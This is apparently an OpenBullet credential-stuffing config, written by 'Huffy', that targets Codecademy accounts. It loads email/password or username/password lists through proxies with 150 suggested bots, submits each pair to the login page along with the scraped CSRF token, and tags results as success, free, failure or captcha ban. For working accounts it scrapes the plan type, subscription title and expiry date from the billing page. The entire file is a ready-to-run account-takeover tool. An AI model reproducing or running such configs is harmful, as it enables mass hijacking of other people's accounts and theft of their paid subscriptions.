[SETTINGS]
{
  "Name": "Codecademy_Huffy",
  "SuggestedBots": 150,
  "LastModified": "2019-04-17T01:55:28.0734075+08:00",
  "AdditionalInfo": "",
  "Author": "Huffy",
  "Version": "1.0.1",
  "IgnoreResponseErrors": false,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "UserPass",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST GET "https://www.codecademy.com/login" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3" 
  HEADER "dnt: 1" 
  HEADER "upgrade-insecure-requests: 1" 

PARSE "<SOURCE>" LR "['authenticity_token'] = \"" "\";" -> VAR "token1" 

FUNCTION URLEncode "<token1>" -> VAR "token" 

REQUEST POST "https://www.codecademy.com/login" 
  CONTENT "authenticity_token=<token>&redirect=&user%5Blogin%5D=<USER>&user%5Bpassword%5D=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3" 
  HEADER "dnt: 1" 
  HEADER "origin: https://www.codecademy.com" 
  HEADER "referer: https://www.codecademy.com/login" 
  HEADER "upgrade-insecure-requests: 1" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Invalid login or password" 
  KEYCHAIN Success OR 
    KEY "pro\":\"" 
  KEYCHAIN Custom "FREE" OR 
    KEY "pro\":\"false\",\"" 
  KEYCHAIN Ban OR 
    KEY "login_requires_captcha'] = true; " 

PARSE "<SOURCE>" LR "role-label\">" "<!-- --> <!-- -->Member" -> CAP "Plan type" 

REQUEST GET "https://www.codecademy.com/account/billing" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3" 
  HEADER "dnt: 1" 
  HEADER "referer: https://www.codecademy.com/account/billing" 
  HEADER "upgrade-insecure-requests: 1" 

PARSE "<SOURCE>" LR "periodEndDt&quot;:&quot;" "&quot" -> CAP "Expires on" 

PARSE "<SOURCE>" LR "subscriptionTitle" "></div><" -> VAR "type" 

PARSE "<type>" LR "\">" "</h3" -> CAP "Subscription Type" 

